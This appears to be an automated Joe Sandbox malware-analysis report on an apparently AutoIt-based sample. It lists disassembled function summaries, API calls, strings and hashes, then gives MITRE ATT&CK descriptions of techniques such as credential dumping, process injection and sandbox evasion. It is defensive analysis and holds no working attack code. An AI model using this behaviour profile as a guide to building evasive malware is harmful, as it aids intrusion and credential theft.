Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: MessageSend$MemoryProcessRead_wcslen
String ID: @U=u
API String ID: 1083363909-2594219639
Opcode ID: 818df6b0c833398b09be90b135e4fc824b43dc69e2cc1e8a931375b57177d6b2
Instruction ID: 8a70d31ce4a26321eec5e8839f5088fa6d1c0f81a1f9647862afbf6f3a88a77f
Opcode Fuzzy Hash: 818df6b0c833398b09be90b135e4fc824b43dc69e2cc1e8a931375b57177d6b2
Instruction Fuzzy Hash: 73016D71900118EFDB51AF90DC99EEE77ACEB14340F80C0A9B64AA6151DE755E89CB90

Function 007F90A1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00779BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00779BB2

DefDlgProcW.USER32(?,0000002B,?,?,?,?,?,?,?,007B769C,?,?,?), ref: 007F9111

Part of subcall function 00779944: GetWindowLongW.USER32(?,000000EB), ref: 00779952

SendMessageW.USER32(?,00000401,00000000,00000000), ref: 007F90F7

Strings

@U=u, xrefs: 007F90F7

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: LongWindow$MessageProcSend
String ID: @U=u
API String ID: 982171247-2594219639
Opcode ID: 55507f7ae25adc788123cb44c62723e3fe9e606a2213bb327ea1807596a21e25
Instruction ID: d43b6c9382153a137f2356e16b7e9691bdf2db52c00f5f20cdfa21a6aa6032dc
Opcode Fuzzy Hash: 55507f7ae25adc788123cb44c62723e3fe9e606a2213bb327ea1807596a21e25
Instruction Fuzzy Hash: ED019A3020520CEBDB219F14DC89FB67BA6FF85765F104468FB550A2A1CB366855CA50

Function 007C246C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007C2480
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 007C2497

Part of subcall function 007C23DB: SendMessageW.USER32(?,0000102B,?,00000000), ref: 007C243B

Strings

@U=u, xrefs: 007C2480, 007C2497

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: 473cb62f7e8dfff09b6b9af9bd3416e6039cbb2eebefe510b83d7d931fcc778e
Instruction ID: 9c6e3d31fc47c8f49e7ea007e8d3ffe9a428c2ec2c4da777263a051c0780b012
Opcode Fuzzy Hash: 473cb62f7e8dfff09b6b9af9bd3416e6039cbb2eebefe510b83d7d931fcc778e
Instruction Fuzzy Hash: DAF0E230601165BBEB211B56CD0EDEFBF6DDF46760B104098B805E2152CAA45E42C7A0

Function 007E747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 007E7493
_wcslen.LIBCMT ref: 007E74B9

Strings

3, 3, 16, 1, xrefs: 007E7483

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 16, 1
API String ID: 176396367-3042988571
Opcode ID: 2f2bd25ab9f536d736952b48bfce5bc9b293646ba9a6bdb40f0a641cfe0d4667
Instruction ID: 536a672be114c4ebed2f672e87042ce1f4caad7c2af14159881a73e9a8a72c54
Opcode Fuzzy Hash: 2f2bd25ab9f536d736952b48bfce5bc9b293646ba9a6bdb40f0a641cfe0d4667
Instruction Fuzzy Hash: 7DE02B022462E160D235227BACC997F5689DFCE750710182BF985C22A6EADCDD91D3A0

Function 007C2BE8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007C2BFA
SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 007C2C2A

Strings

@U=u, xrefs: 007C2BFA, 007C2C2A

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: dd7e754deaefb2ba2e3aee84e7c5869ffe78d0bb86da36a459281298e87087c3
Instruction ID: cbb53a2a42fa08c872f0bee5ff46a7cb0795f7aaf7195f7105b46f6adb3813b1
Opcode Fuzzy Hash: dd7e754deaefb2ba2e3aee84e7c5869ffe78d0bb86da36a459281298e87087c3
Instruction Fuzzy Hash: F5F08C75240308BBFA226A809C8AFBA3B58AB14761F104018B7099A191C9E65C0097A0

Function 007C2D60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007C286B: SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 007C2884
Part of subcall function 007C286B: SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 007C28B6

SendMessageW.USER32(?,0000110B,00000005,00000000), ref: 007C2D80
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 007C2D90

Strings

@U=u, xrefs: 007C2D80, 007C2D90

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: eff1d4394215513d6a3bffca9725f6ad05d95ec142c34c61b0d1686e089f85f2
Instruction ID: 36b6bbb1460e06c93be84104a4d41eca81bba0e6970f19a1a5aa8396d5992174
Opcode Fuzzy Hash: eff1d4394215513d6a3bffca9725f6ad05d95ec142c34c61b0d1686e089f85f2
Instruction Fuzzy Hash: A6E0D835348309BFF6221A519D4AFB7375CD768B51F10002EF30565192DEA6CC12D524

Function 007F5829 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000133D,?,?), ref: 007F5855
InvalidateRect.USER32(?,?,00000001), ref: 007F5877

Strings

@U=u, xrefs: 007F5855

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: InvalidateMessageRectSend
String ID: @U=u
API String ID: 909852535-2594219639
Opcode ID: 8a9505573818f20ba54dd5743ea1aacc950c95be8a3bbf56cf93688bbe0be054
Instruction ID: 32317fb765e6de60b90291162a3feb542ad142df9d7fb64500b6c6c7264d4246
Opcode Fuzzy Hash: 8a9505573818f20ba54dd5743ea1aacc950c95be8a3bbf56cf93688bbe0be054
Instruction Fuzzy Hash: BAF08232608188AEDB21CB65DD44FFEBBF8EB85321F0481F6E75AD9151D6348A81DB20

Function 007C0B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 007C0B23

Strings

AutoIt, xrefs: 007C0B17
Error allocating memory., xrefs: 007C0B1C

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: af62f697fafbf4f86abc24adc8e099e616d0f7dac12e51f3ebccd2b9abb800d4
Instruction ID: 8a8d90dc7cecdc39c2487d0f4b3ca8ab0cf87735bd9e7343e5698ddfbd5cfee3
Opcode Fuzzy Hash: af62f697fafbf4f86abc24adc8e099e616d0f7dac12e51f3ebccd2b9abb800d4
Instruction Fuzzy Hash: 08E0D83128431CAAD21136547D07F997B848F05B50F10442AFB58955C38AE9289086E9

Function 00780D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0077F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00780D71,?,?,?,0076100A), ref: 0077F7CE

IsDebuggerPresent.KERNEL32(?,?,?,0076100A), ref: 00780D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0076100A), ref: 00780D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00780D7F

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: f1521149687863b9392a8a070f22c2252f12a77686bcbc5db24f43778801c5f0
Instruction ID: c6952373f44f05db86536a884c5495848b3cb7a1a0c65d8901eb91d504d6784c
Opcode Fuzzy Hash: f1521149687863b9392a8a070f22c2252f12a77686bcbc5db24f43778801c5f0
Instruction Fuzzy Hash: 3AE06D702403018BD760AFB8D9083527BE4BF00B50F00892DE886C6751DBBCE448CBE1

Function 007BD21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 007BD220

Strings

%.3d, xrefs: 007BD22B
X64, xrefs: 007BD2A8

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: 403d08c66e73d316aa17721a46647debcef426ca4218a8c4119c39507d09dce4
Instruction ID: 5573c71f8276da3cbbfc3df7b9b5de49d3f6390be0bb9e1fc0db4448308f44f1
Opcode Fuzzy Hash: 403d08c66e73d316aa17721a46647debcef426ca4218a8c4119c39507d09dce4
Instruction Fuzzy Hash: 62D012A1C09158E9CF6096E0DD49AF9B37CFB08341F50C462F91AD1040F62CCD48AB61

Function 007F2356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007F236C
PostMessageW.USER32(00000000), ref: 007F2373

Part of subcall function 007CE97B: Sleep.KERNEL32 ref: 007CE9F3

Strings

Shell_TrayWnd, xrefs: 007F2365

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 2102a68f89380ffc065a9af2db59c7ebc0df460153b5a5d2a973ad9256177ac5
Instruction ID: 7495b27de38ebbfbe0f46d1097cc62a533b342579e0992b008754bbeb34cd86a
Opcode Fuzzy Hash: 2102a68f89380ffc065a9af2db59c7ebc0df460153b5a5d2a973ad9256177ac5
Instruction Fuzzy Hash: 99D022323C0310BBE264B330EC0FFC67714AB00B00F008A2A7301EA1D0C9F8B810CA08

Function 007F2322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007F232C
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 007F233F

Part of subcall function 007CE97B: Sleep.KERNEL32 ref: 007CE9F3

Strings

Shell_TrayWnd, xrefs: 007F2325

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: a42036d8b258193b8d1aaaa6e67a4162d9256c94f94f0de4453a49db2e5b2b67
Instruction ID: ddca5ef74f6867025cf94f7a4df74dd7ea5d9b89ad82431cc2d09aaa87055980
Opcode Fuzzy Hash: a42036d8b258193b8d1aaaa6e67a4162d9256c94f94f0de4453a49db2e5b2b67
Instruction Fuzzy Hash: 95D02232384310BBE264B330EC0FFD67B14AB00B00F008A2A7305EA1D0C9F8B810CA08

Function 007C2313 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 007C231F
SendMessageW.USER32(00000000,00001200,00000000,00000000), ref: 007C232D

Strings

@U=u, xrefs: 007C231F, 007C232D

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: 56fe6d9783b307369ded60e8ce0977773c72fa33ee112db7bbe145c83c049d65
Instruction ID: 280ef7ecadf50c4666b16617faee25c32ff614fa183bff453e17d3168249c975
Opcode Fuzzy Hash: 56fe6d9783b307369ded60e8ce0977773c72fa33ee112db7bbe145c83c049d65
Instruction Fuzzy Hash: 8CC08C311041C0BAF7320B23BE0CC673F3DE7CBF0130000CCB204C44A586680000C638

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

